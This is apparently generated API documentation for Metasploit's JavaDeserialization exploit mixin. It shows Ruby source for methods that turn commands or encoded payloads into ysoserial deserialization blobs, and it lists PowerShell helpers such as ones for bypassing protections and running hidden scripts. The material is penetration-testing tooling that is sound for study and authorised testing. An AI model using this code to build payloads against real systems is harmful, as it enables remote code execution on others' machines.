Module: Msf::Exploit::JavaDeserialization

Includes:
Powershell
Defined in:
lib/msf/core/exploit/java_deserialization.rb

Instance Method Summary

Methods included from Powershell

#bypass_powershell_protections, #cmd_psh_payload, #compress_script, #decode_script, #decompress_script, #encode_script, #generate_psh_args, #generate_psh_command_line, #initialize, #make_subs, #process_subs, #read_script, #run_hidden_psh

Instance Method Details

#generate_java_deserialization_for_command(name, shell, command) ⇒ String

Generate a binary blob that, when deserialized by Java, will execute the specified command using the platform-specific shell. Many deserialization gadget chains hand the command to `Runtime.getRuntime().exec()` as a single string, which Java tokenizes on whitespace with no understanding of quoting, so commands containing spaces, quotes or redirections are split incorrectly. Selecting a shell makes the gadget invoke the command as an argument array (shell, shell flag, command string) through that shell, which sidesteps those limitations.

Parameters:

  • name (String)

    The name of the YSoSerial payload to use.

  • shell (String)

    The shell to use for executing the command. Must be one of bash, cmd or powershell.

  • command (String)

    The OS command to execute.

Returns:

  • (String)

    The opaque data blob.


# File 'lib/msf/core/exploit/java_deserialization.rb', line 19

def generate_java_deserialization_for_command(name, shell, command)
  # here we force usage of a modified type to avoid compatibility issues with command characters that are present in
  # some ysoserial payloads
  unless %w{ bash cmd powershell }.include? shell
    raise RuntimeError, 'Invalid shell for Java Deserialization payload generation'
  end

  Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: shell)
end

#generate_java_deserialization_for_payload(name, payload) ⇒ String

Generate a binary blob that, when deserialized by Java, will execute the specified payload. This routine converts the payload to an OS command automatically based on its platform and architecture, so not every combination is supported: on Windows, native x86 and x64 payloads are wrapped in a PowerShell command line and ARCH_CMD payloads are used as-is; on every other platform only ARCH_CMD payloads are accepted.

Parameters:

  • name (String)

    The name of the YSoSerial payload to use.

  • payload (Msf::EncodedPayload)

    The payload to execute.

Returns:

  • (String)

    The opaque data blob.

Raises:

  • (RuntimeError)

    This raises a RuntimeError if the specified payload can not be automatically converted to an operating system command.


# File 'lib/msf/core/exploit/java_deserialization.rb', line 39

def generate_java_deserialization_for_payload(name, payload)
  command = nil

  if payload.platform.platforms == [Msf::Module::Platform::Windows]
    if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
      command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true, encode_final_payload: true })
    elsif payload.arch.first == Rex::Arch::ARCH_CMD
      command = payload.encoded
    end
    shell = 'cmd'
  else
    if payload.arch.first == Rex::Arch::ARCH_CMD
      command = payload.encoded
    end
    shell = 'bash'
  end

  if command.nil?
    raise RuntimeError, 'Could not generate the payload for the platform/architecture combination'
  end

  generate_java_deserialization_for_command(name, shell, command)
end